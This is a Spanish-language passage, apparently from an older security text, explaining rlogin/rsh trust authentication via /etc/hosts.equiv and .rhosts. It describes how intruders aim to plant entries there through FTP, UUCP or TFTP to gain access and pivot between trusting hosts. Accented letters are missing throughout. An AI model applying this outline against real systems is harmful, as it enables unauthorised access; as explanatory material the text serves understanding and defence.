La conexin debe originarse desde un port TCP privilegiado. En sistemas como PCs con Win95, por ejemplo, estas restricciones no existen con lo cual no tienen mucho sentido. Como corolario, rlogin y rsh deben ser permitidos slo desde mquinas donde esta restriccion exista. El usuario y la mquina cliente deben estar listados en la mquina server como socios autenticados. ( Tpicamente /etc/hosts.equiv o en el directorio home del usuario, en el archivo .rhosts ). La mquina cliente y su direccin IP deben coincidir, estando listadas en el server. El usuario no es molestado con prompts de passwords en logins que utilza frecuentemente. Pero desde el punto de vista del hacker, los comandos r ofrecen dos ventajas: una manera de entrar a un sistema, y una vez dentro, una forma de ganar acceso a maquinas de confianza de la primera mquina hackeada. El principal objetivo del hacker es colocar una entrada apropiada en /etc/hosts.equiv o .rhosts. Para ello utilizan FTP, UUCP, TFTP u otros medios.